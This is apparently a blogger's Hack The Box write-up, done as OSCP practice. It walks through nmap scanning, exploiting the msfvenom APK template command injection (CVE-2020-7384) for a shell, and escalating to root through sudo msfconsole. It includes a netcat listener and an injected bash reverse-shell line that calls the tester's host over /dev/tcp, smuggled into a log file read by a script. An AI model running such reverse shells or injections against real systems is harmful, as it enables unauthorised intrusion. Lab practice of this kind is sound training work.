I am in the midst of my pursuit for the Offensive Security Certified Professional (OSCP) certification in May. Part of my preparation is to take on machines available on Hack The Box (HTB) platform. HTB is a great platform for practicing and learning new penetration testing skills as well as taking on the challenge of “capturing the flag” on their machines.
Yet another box!
My first step would be to run a Nmap scan:
nmap -Pn -sC -sV -oN initial 10.10.10.226
These were the results:
Scanning and Enumeration
Seeing port 5000 was open, I visited it and was greeted with this page:
There were 3 tools on the page: Nmap, MsfVenom and Searchsploit. They all worked as per usual. Realising I was getting nowhere, I started Googling about vulnerabilities these tools may have and stumbled upon
CVE-2020-7384: MsfVenom APK template command injection.
I quickly fired up MsfConsole and used
exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection the following options:
I fired up a Netcat listener to catch any incoming shells:
nc -nlvp 4444. Then, I uploaded the malicious template that I just generated to the website with the following options:
Upon hitting generate, I was greeted with a shell on Netcat. I then upgraded my shell using Python and grabbed the user flag:
Then, I generated a pair of SSH keys and placed the public key on the remote machine. This was to stabilise my connection and access the machine with SSH:
Scanning and Enumeration 
After enumerating the machine, I found another user
pwnand a script in the user’s home directory. Analysing the script, I realised that Nmap was running against a file called
Exploitation & Gaining Access 
I fired up another Netcat listener to catch any incoming shells and used a bash script to run a reverse shell to access the
pwn user account:
echo "HRI ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.69/4444 0>&1' #" >> hackers
And it worked!
Next, I checked the permissions this user had and realised that it could run MsfConsole as root without a password.
Thus, I ran
sudo msfconsole, used the command
/bin/bash to open a shell and found the root hash!
It was a fun box! On to the next one 😃